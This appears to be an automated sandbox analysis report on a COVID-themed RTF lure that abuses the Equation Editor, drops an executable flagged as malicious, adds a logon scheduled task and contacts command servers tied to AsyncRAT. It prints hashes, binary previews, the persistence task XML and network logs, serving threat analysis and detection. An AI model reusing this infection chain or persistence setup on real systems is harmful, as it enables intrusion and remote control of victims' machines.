                                                  Preview: ..@.A.p.J.n.b.S.m.E.I.k.B.Y.w.P.B.r.@.-.D.y.s.i.v.y.j.z.Z.m.o.I.e.C.P.i.F.<.e.h.&.&.0._.M.-.C._.g.-.-._.-.d.,.6.4.>.3.2.9.9.7.$.C.v.>.y.t.=.n.5.|.:.%._.>.j.n.8.%.b.m.;.=.u...2.8..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . .
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AB5F6AD7-3C7C-4823-93B4-8E22DB7DEE25}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1536
                                                  Entropy (8bit):1.3555252507007243
                                                  Encrypted:false
                                                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbG:IiiiiiiiiifdLloZQc8++lsJe1Mzh
                                                  MD5:612870F14611A2846F34F3E170825E80
                                                  SHA1:721433825DFB55328F6D5FE264C74AECDC016C16
                                                  SHA-256:A1BA57C7E4DB0AF82EA6DFA91F2DE55C40DAA9E5BC995CA4BDCFA3E9E8348A1D
                                                  SHA-512:8C1095E5D14A48CB9178CCEE20976FD7AC1CF0F6ED5535EB39EED4354435DF418AB523EE895F8EFF8E8DE78D8A447918A965DEAF6C6C0EB634BD1694CBF549B2
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\Cab7021.tmp
                                                  Process:C:\Users\Public\69577.exe
                                                  File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                                                  Category:dropped
                                                  Size (bytes):59134
                                                  Entropy (8bit):7.995450161616763
                                                  Encrypted:true
                                                  SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                                                  MD5:E92176B0889CC1BB97114BEB2F3C1728
                                                  SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                                                  SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                                                  SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                                                  C:\Users\user\AppData\Local\Temp\Tar7022.tmp
                                                  Process:C:\Users\Public\69577.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):152788
                                                  Entropy (8bit):6.316654432555028
                                                  Encrypted:false
                                                  SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                                                  MD5:64FEDADE4387A8B92C120B21EC61E394
                                                  SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                                                  SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                                                  SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                  C:\Users\user\AppData\Local\Temp\tmpA055.tmp
                                                  Process:C:\Users\Public\69577.exe
                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1619
                                                  Entropy (8bit):5.144232284026302
                                                  Encrypted:false
                                                  SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBBtn:cbhZ7ClNQi/rydbz9I3YODOLNdq3V
                                                  MD5:670E506D7A13CDF1A7EDA14E5533D0EE
                                                  SHA1:670E6321EE31AC7BCC58B1EA48B82E8676FA30E0
                                                  SHA-256:4723B0312E0807A682EFC2672E778A957AF005EE722656F1A98227D816E7ECB4
                                                  SHA-512:54C615BAFAAD04592CC866C974DA3796577910B258CF689B6C50C0F951424D5456B6BB0DE72001E415DC58ED999C7D4F4DD7AE319A17FD57EB925533E779A93E
                                                  Malicious:true
                                                  Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Deadly Variants of Covid 19.LNK
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Tue Feb 23 02:52:35 2021, length=833197, window=hide
                                                  Category:dropped
                                                  Size (bytes):2198
                                                  Entropy (8bit):4.5804577209594095
                                                  Encrypted:false
                                                  SSDEEP:48:8mg/XT0jFCkMGr1qQh2mg/XT0jFCkMGr1qQ/:8z/XojFCorAQh2z/XojFCorAQ/
                                                  MD5:214DE48BB7AB3394487ED65A59720EE4
                                                  SHA1:69906D7D7F6E81438464CDA474220ED1E80099DA
                                                  SHA-256:9C74F780B3A246C5F12CA814CADAE25408C6EA1C7836F23FD1E0D92B9835F740
                                                  SHA-512:CCC50159FCFF8244A5E213045A7EBFE268126325B32087F4C07333633C097335787C6A8E1A08CF79B21629077ACFA00429FD4741C4B321612A598187C0344181
                                                  Malicious:false
                                                  Preview: L..................F.... ....7h..{...7h..{..9AKR.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....WR.. .DEADLY~1.DOC..l.......Q.y.Q.y*...8.....................D.e.a.d.l.y. .V.a.r.i.a.n.t.s. .o.f. .C.o.v.i.d. .1.9...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\128757\Users.user\Desktop\Deadly Variants of Covid 19.doc.6.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.e.a.d.l.y. .V.a.r.i.a.n.t.s. .o.f. .C.o.v.i.d. .1.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):119
                                                  Entropy (8bit):4.715190191727231
                                                  Encrypted:false
                                                  SSDEEP:3:M1WoUzg0Fo5Ezg0FomX1WoUzg0Fov:MU7FFyEFFu7FFy
                                                  MD5:F5B042E282283867959C5C4DC006A269
                                                  SHA1:46AED4B701DD3CF1283F01E3284575073231499E
                                                  SHA-256:E0FFBF41794378ABE8041471D6044D8AAD0AF014C35005E2C9803DC4E1E4EBB0
                                                  SHA-512:8C9AD60F956B9855762689C284FE04B746B69A6CDBE0FE19F8E52869777C5C0060BE028F3BA140C50EE7F2070822A8B8283528F94403C1B9F1FD3921775C40DC
                                                  Malicious:false
                                                  Preview: [doc]..Deadly Variants of Covid 19.LNK=0..Deadly Variants of Covid 19.LNK=0..[doc]..Deadly Variants of Covid 19.LNK=0..
                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.431160061181642
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                  MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                  SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                  SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                  SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                  Malicious:false
                                                  Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):2
                                                  Entropy (8bit):1.0
                                                  Encrypted:false
                                                  SSDEEP:3:Qn:Qn
                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                  Malicious:false
                                                  Preview: ..
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WBLPQVYT.txt
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:ASCII text
                                                  Category:downloaded
                                                  Size (bytes):90
                                                  Entropy (8bit):4.346866086240761
                                                  Encrypted:false
                                                  SSDEEP:3:jvQl5EEdAcAKgGIqkYi2SSz3LRQLWgVdTmy:21CcTDIqji2R3dgVdTz
                                                  MD5:FC0E959CB4BBA53D9D57ED91323DC910
                                                  SHA1:EC318BF5B96F688BE0F48F6E765B59C6C380704D
                                                  SHA-256:203AC0200F37AEC3B1EF816C1FDC91CC78ABEF0417C8756D5D0CB0860826ECDB
                                                  SHA-512:5555C234266A7C5035CC5E5ED070EE005737CBAC077B0896BFFA9A57AD42A14DE72F7C67BF1502CCB5A1128461636F2D7BAC352A82DB14418FB465DF996F37C4
                                                  Malicious:false
                                                  IE Cache URL:bit.ly/
                                                  Preview: _bit.l1miQy-aa188e9258a87e82cc-00G.bit.ly/.1536.3016295680.30906045.2606431658.30869911.*.
                                                  C:\Users\user\AppData\Roaming\rLliXAh.exe
                                                  Process:C:\Users\Public\69577.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1143808
                                                  Entropy (8bit):6.509278540577558
                                                  Encrypted:false
                                                  SSDEEP:12288:GRe0EHIOjYgydfAv9kmIdffnlyMNZVjswXXyyWp+X117FlTxvrvt:TVydf2IdffY+rwwX77FlTxR
                                                  MD5:DCCD2F6A61F8D95552863B537F2B6698
                                                  SHA1:62C9D1B5C489133CBC0F19F3902724847BBFD765
                                                  SHA-256:3266A27BD3BB930017AA09BC7483AB2E047292B47F9D9C5796C02FA566D00CFE
                                                  SHA-512:E63F98F144CF843D1A920C37A9BBB689F3ACF11697637DB70636C842323805A5E3FC2DEDBAE9CC53FB5FEBC4D8D2E37E0E5BE3E59EDD6FEE44A90FB92699FFE3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 11%
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3`..............P..&...L.......E... ........@.. ....................................@.................................XE..S....`...J........................................................................... ............... ..H............text....%... ...&.................. ..`.rsrc....J...`...J...(..............@..@.reloc...............r..............@..B.................E......H........E..\............g..(............................................0..#.......+.&...(....(..........(.....o.....*..................0..........+.&..8......8.....+3...a.+....a....YE................I.....+......&..+.....+....YE................&.......=...X...a...w.........+.+...(......+....8}........&..8p......8h.....(.....=.8Y.....(....+.(....8C....?.8>.....<.85.....(....+..8......8......>.8....*..0..........+.&...+H.. a.+....a8.......X+H..(H....+......&..+...%YE........6
                                                  C:\Users\user\Desktop\~$adly Variants of Covid 19.doc
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.431160061181642
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                  MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                  SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                  SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                  SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                  Malicious:false
                                                  Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                  C:\Users\Public\69577.exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):1143808
                                                  Entropy (8bit):6.509278540577558
                                                  Encrypted:false
                                                  SSDEEP:12288:GRe0EHIOjYgydfAv9kmIdffnlyMNZVjswXXyyWp+X117FlTxvrvt:TVydf2IdffY+rwwX77FlTxR
                                                  MD5:DCCD2F6A61F8D95552863B537F2B6698
                                                  SHA1:62C9D1B5C489133CBC0F19F3902724847BBFD765
                                                  SHA-256:3266A27BD3BB930017AA09BC7483AB2E047292B47F9D9C5796C02FA566D00CFE
                                                  SHA-512:E63F98F144CF843D1A920C37A9BBB689F3ACF11697637DB70636C842323805A5E3FC2DEDBAE9CC53FB5FEBC4D8D2E37E0E5BE3E59EDD6FEE44A90FB92699FFE3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 11%
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....3`..............P..&...L.......E... ........@.. ....................................@.................................XE..S....`...J........................................................................... ............... ..H............text....%... ...&.................. ..`.rsrc....J...`...J...(..............@..@.reloc...............r..............@..B.................E......H........E..\............g..(............................................0..#.......+.&...(....(..........(.....o.....*..................0..........+.&..8......8.....+3...a.+....a....YE................I.....+......&..+.....+....YE................&.......=...X...a...w.........+.+...(......+....8}........&..8p......8h.....(.....=.8Y.....(....+.(....8C....?.8>.....<.85.....(....+..8......8......>.8....*..0..........+.&...+H.. a.+....a8.......X+H..(H....+......&..+...%YE........6

                                                  Static File Info

                                                  General

                                                  File type:Rich Text Format data, unknown version
                                                  Entropy (8bit):6.324998517598124
                                                  TrID:
                                                  • Rich Text Format (5005/1) 55.56%
                                                  • Rich Text Format (4004/1) 44.44%
                                                  File name:Deadly Variants of Covid 19.doc
                                                  File size:833197
                                                  MD5:3d9171d094dae1fb8da244756dd9733c
                                                  SHA1:91e43ec7a21e7e8c1fc2a6202ca3545974084ad2
                                                  SHA256:4d1bde540b3c45739e1d8cff08e801ccb6ff9caad391109dc298b011a914e57c
                                                  SHA512:3c612f02b4f3ae3113f08af66325cee173eede0bd7ff366048c2a86279c3dc9d6fa23e5e6d105d7d4dca5fb3c993e1b57f9674d3ccd70b79cb5b689043538eac
                                                  SSDEEP:24576:GaCaCaCaCaCaCaCaCaCaCaCaCaCaCaCaCaCaCaCaCaCaCaCaCaO7v:G999999999999999999999999b
                                                  File Content Preview:{\rtf51437\page11419927264400464@ApJnbSmEIkBYwPBr@-DysivyjzZmoIeCPiF<eh&&0_M-C_g--_-d,64>32997$Cv>yt=n5|:%_>jn8%bm\mklP;=u\m3699.28.... .... ...... .... .... ....

                                                  File Icon

                                                  Icon Hash:e4eea2aaa4b4b4a4

                                                  Static RTF Info

                                                  Objects

                                                  IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                  0000C4595hno

                                                  Network Behavior

                                                  Snort IDS Alerts

                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                  02/22/21-19:52:54.267775TCP2030673ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)50004916979.134.225.49192.168.2.22

                                                  Network Port Distribution

                                                  TCP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Feb 22, 2021 19:52:34.030258894 CET4916780192.168.2.2267.199.248.10
                                                  Feb 22, 2021 19:52:34.078953981 CET804916767.199.248.10192.168.2.22
                                                  Feb 22, 2021 19:52:34.079070091 CET4916780192.168.2.2267.199.248.10
                                                  Feb 22, 2021 19:52:34.079585075 CET4916780192.168.2.2267.199.248.10
                                                  Feb 22, 2021 19:52:34.130676985 CET804916767.199.248.10192.168.2.22
                                                  Feb 22, 2021 19:52:34.227475882 CET804916767.199.248.10192.168.2.22
                                                  Feb 22, 2021 19:52:34.227626085 CET4916780192.168.2.2267.199.248.10
                                                  Feb 22, 2021 19:52:34.359882116 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.446923971 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.447447062 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.448152065 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.536376953 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.536528111 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.537424088 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.537738085 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.537766933 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.537790060 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.537816048 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.537839890 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.537863970 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.537875891 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.537887096 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.537890911 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.537894964 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.537914038 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.537961006 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.537966967 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.539580107 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.547821045 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.548002958 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.625053883 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.625113010 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.625154018 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.625185013 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.625196934 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.625211000 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.625214100 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.625232935 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.625323057 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.625353098 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.625403881 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.625406027 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.625413895 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.625444889 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.625531912 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.625684023 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.627624989 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.712013960 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.712066889 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.712100983 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.712116957 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.712121964 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.712162018 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.712373972 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.712414980 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.712452888 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.712481022 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.712486029 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.712491989 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.712531090 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.712532997 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.712537050 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.712595940 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.716445923 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.716567993 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.798217058 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.798254967 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.798274040 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.798299074 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.798408985 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.798568964 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.798593998 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.798612118 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.798633099 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.798645020 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.798650980 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.798702955 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.798712969 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.803931952 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.803965092 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.804162979 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.807508945 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.886324883 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.886382103 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.886423111 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.886470079 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.886482954 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.886521101 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.886521101 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.886526108 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.886571884 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.886626005 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.886630058 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.886697054 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.886878967 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.886893034 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.886989117 CET4916880192.168.2.2293.89.224.134
                                                  Feb 22, 2021 19:52:34.895035028 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.895128012 CET804916893.89.224.134192.168.2.22
                                                  Feb 22, 2021 19:52:34.895210981 CET4916880192.168.2.2293.89.224.134

                                                  UDP Packets

